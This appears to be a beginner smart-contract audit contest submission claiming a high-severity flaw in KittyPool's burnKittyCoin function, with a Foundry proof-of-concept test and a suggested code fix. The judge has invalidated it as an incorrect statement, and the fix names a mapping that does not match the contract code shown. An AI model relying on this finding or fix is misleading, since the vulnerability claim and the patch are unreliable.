First Flight #21: KittyFi

First Flight #21
Beginner FriendlyDeFiFoundry
100 EXP
View results
Submission Details
Severity: high
Invalid

H-01 : Unauthorized Cross-Account Balance Manipulation and Token Burn Mismatch in `KittyPool::burnKittyCoin`

Summary

The KittyPool smart contract contains a critical vulnerability. An attacker can exploit the KittyPool::burnKittyCoin function by manipulating other user's account balances.

Vulnerability Details

The KittyPool contract contains a critical vulnerability in its KittyPool::burnKittyCoin function that allows unauthorized manipulation of user balances. This flaw permits any user to reduce another user's internal balance without permission, while incorrectly burning tokens from the caller's account instead of the intended user's account. This creates a significant mismatch between the contract's internal accounting and actual token balances, potentially leading to financial losses and system-wide inconsistencies.

function burnKittyCoin(address _onBehalfOf, uint256 _ameownt) external {
@> kittyCoinMeownted[_onBehalfOf] -= _ameownt;
i_kittyCoin.burn(msg.sender, _ameownt);
}

Add this test case to your kittyFi.test.sol file.

function test_UnauthorizedBurning() public {
uint256 toDeposit = 5 ether;
uint256 amountToMint = 20e18; // 20 KittyCoin
// User deposits collateral and mints KittyCoin
vm.startPrank(user);
IERC20(weth).approve(address(wethVault), toDeposit);
kittyPool.depawsitMeowllateral(address(weth), toDeposit);
kittyPool.meowintKittyCoin(amountToMint);
vm.stopPrank();
// Bob deposits collateral and mints KittyCoin
vm.startPrank(bob);
IERC20(weth).approve(address(wethVault), toDeposit);
kittyPool.depawsitMeowllateral(address(weth), toDeposit);
kittyPool.meowintKittyCoin(amountToMint);
vm.stopPrank();
// Record initial balances
uint256 userInitialMeownted = kittyPool.getKittyCoinMeownted(user);
uint256 bobInitialMeownted = kittyPool.getKittyCoinMeownted(bob);
uint256 userInitialBalance = kittyCoin.balanceOf(user);
uint256 bobInitialBalance = kittyCoin.balanceOf(bob);
// Bob attempts to burn User's KittyCoin
uint256 toBurn = 15e18;
vm.prank(bob);
kittyPool.burnKittyCoin(user, toBurn);
// Record final balances
uint256 userFinalMeownted = kittyPool.getKittyCoinMeownted(user);
uint256 bobFinalMeownted = kittyPool.getKittyCoinMeownted(bob);
uint256 userFinalBalance = kittyCoin.balanceOf(user);
uint256 bobFinalBalance = kittyCoin.balanceOf(bob);
// Assertions to demonstrate the vulnerability
assertEq(
userFinalMeownted,
userInitialMeownted - toBurn,
"User's meownted balance should decrease"
);
assertEq(
bobFinalMeownted,
bobInitialMeownted,
"Bob's meownted balance should not change"
);
assertEq(
userFinalBalance,
userInitialBalance,
"User's actual token balance should not change"
);
assertEq(
bobFinalBalance,
bobInitialBalance - toBurn,
"Bob's actual token balance should decrease"
);
// Additional assertion to show the mismatch
assertNotEq(
userFinalMeownted,
userFinalBalance,
"User's meownted balance should not match actual balance"
);
}

Impact

  1. Unauthorized Balance Manipulation:

    • Any user can call KittyPool::burnKittyCoin with any address as the _onBehalfOf parameter.

    • This reduces the inMeownted balance of the specified address without any authorization check.

  2. Incorrect Token Burning:

  • While the function reduces the inMeownted balance of the _onBehalfOf address, it burns tokens from the msg.sender's balance.

  • This creates a mismatch between the internal accounting (inMeownted)and actual token balances.

Tools Used

Manual Review

Recommendations

Make these changes to your KittyPool::burnKittyCoin function

- function burnKittyCoin(address _onBehalfOf, uint256 _ameownt) external {
+ function burnKittyCoin(uint256 _ameownt) external {
- kittyCoinMeownted[_onBehalfOf] -= _ameownt;
+ inMeownted[msg.sender] -= _ameownt;
i_kittyCoin.burn(msg.sender, _ameownt);
}
Updates

Lead Judging Commences

shikhar229169 Lead Judge 11 months ago
Submission Judgement Published
Invalidated
Reason: Incorrect statement

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.